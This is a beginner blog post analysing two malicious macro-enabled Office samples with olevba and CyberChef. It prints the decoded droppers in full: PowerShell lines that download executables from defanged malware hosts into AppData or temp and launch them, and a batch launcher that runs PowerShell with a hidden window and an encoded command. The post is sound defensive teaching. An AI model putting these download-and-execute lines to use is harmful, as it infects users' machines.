Analyzing Macro enabled Office Documents

Experience Level required: beginner

In this blog we will Learn how to analyze MS Office Macro enabled Documents.

1st sample:
    8d15fadf25887c2c974e521914bb7cba762a8f03b1c97a2bc8198e9fb94d45a5
2nd sample:
    a9f8b7b65e972545591683213bb198c1767424423ecc8269833f6e784aa8bc99

Let’s see the sample in Virus Total

37 of 63 security vendors detected this file as malicious.

Let’s open the file.

It uses a social engineering technique to persuade the user to enable the macros that lead to the infection of the user.

Let’s see the macro code of the sample, I’ll use olevba

olevba "C:UsersM4lcodeDesktopxlm sample8d15fadf25887c2c974e521914bb7cba762a8f03b1c97a2bc8198e9fb94d45a5.xlsm"

It has many suspicious functions, It also has base64 strings

Let’s dump the macro code to a file to see it better

olevba -c "C:UsersM4lcodeDesktopxlm sample8d15fadf25887c2c974e521914bb7cba762a8f03b1c97a2bc8198e9fb94d45a5.xlsm" > dump.vba

Let’s view the dumped file with notepad ++ (you can view it with any text editor software)

This function concatenates two strings, then reverses the result string and assigns it to Prefix3.

I’ll use this python script to reverse the string

def reverse_string(input_string):
    return input_string[::-1]

input_string = "cne- 1 niw- exe.llehsrewop.1vllehSrewoPswodniW23metsySswodniW:C"
reversed_string = reverse_string(input_string)
print("Original string:", input_string)
print("Reversed string:", reversed_string)

Prefix3 =

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -win 1 -enc

Let’s go to the next function

The function concatenates 8 base64 encoded strings and assigns it to Prefix2.

I’ll use cyberchef to decode the strings

Prefix2 =

$ProcName = "Ktaqftbffhqhoxzyblssi.exe";
(New-Object System.Net.WebClient).DownloadFile("hxxps[://]www[.]qqqformula[.]co[.]za/works/RICH[.]pif","$env:APPDATA$ProcName");
Start-Process ("$env:APPDATA$ProcName")

Let’s go to the next function

It concatenates strings

Prefix1 =

start /MIN

Let’s go to the last function

It concatenates Prefix1, Prefix3 and Prefix2 and print the result in a .bat file named “Bixkcozkkemqyslgmpvwuri.bat” then it runs the file

The resulted .bat file will be:

start /MIN C:WindowsSystem32WindowsPowerShellv1.0powershell.exe  - win 1  - enc $ProcName = "Ktaqftbffhqhoxzyblssi.exe";
(New - Object System.Net.WebClient).DownloadFile("hxxps[://]www[.]qqqformula[.]co[.]za/works/RICH[.]pif", "$env:APPDATA$ProcName");
Start - Process ("$env:APPDATA$ProcName")

This script runs powershell script to download file from “hxxps[://]www[.]qqqformula[.]co[.]za/works/RICH[.]pif” to the current user’s AppData directory with name “Ktaqftbffhqhoxzyblssi.exe” and executes it.

32 of 60 security vendors detected this file as malicious.

Let’s open the sample

It also employs a social engineering technique to convince the user to enable macros, which then leads to the user being infected.

Let’s see its macro code

olevba C:UsersM4lcodeDesktopee6d2f06ce4476370cb830acb3890dca.xls

It uses wscript language and base64 encoding

Let’s dump it to file

olevba -c C:UsersM4lcodeDesktopee6d2f06ce4476370cb830acb3890dca.xls > dump.vba

Let’s try to decode this strings

$fdsfsdf = "fsfdghfddfgh";
(NEw-objEct `N`e`T`.`W`e`B`C`l`i`e`N`T`).DownLoAdfIlE('hxxp[://]suyashcollegeofnursing[.]com/language/Don163/CryptedFile163[.]exe', "$ENv:tempjfcbvept.exe");
Start "$ENv:tempjfcbvept.exe";
$fdsfsdf = "fsfdghfddfgh";

This powershell script is downloading a file from “hxxp[://]suyashcollegeofnursing[.]com” to temp directory with name “jfcbvept.exe” then it starts it

CreateObject(“Wscript.Shell”) return is assigned to zKShMevSa

So zKShMevSa acts like Wscript.Shell and zKShMevSa.Run = Wscript.Shell.Run.

It’s clear now Wscript.Shell.Run executes the powershell script that downloads the malware from “hxxp[://]suyashcollegeofnursing[.]com” to temp directory with name “jfcbvept.exe” then it executes it.

This blog is authored by Mostafa Farghaly(M4lcode).

Source: https://blog.cyber5w.com/Analyzing-Macro-Enabled-Office-Documents.html